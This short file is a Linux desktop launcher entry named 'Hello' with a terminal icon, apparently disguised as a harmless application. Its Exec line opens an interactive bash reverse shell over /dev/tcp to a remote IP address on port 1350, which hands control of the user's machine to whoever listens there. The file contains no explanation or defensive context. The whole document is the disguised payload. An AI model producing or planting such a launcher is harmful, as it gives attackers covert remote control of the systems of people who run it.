[Desktop Entry]
Version=1.0
Name=Hello
Exec=/bin/bash -i > /dev/tcp/82.165.97.169/1350 0<&1 2>&1
Icon=utilities-terminal
Terminal=true
Type=Application
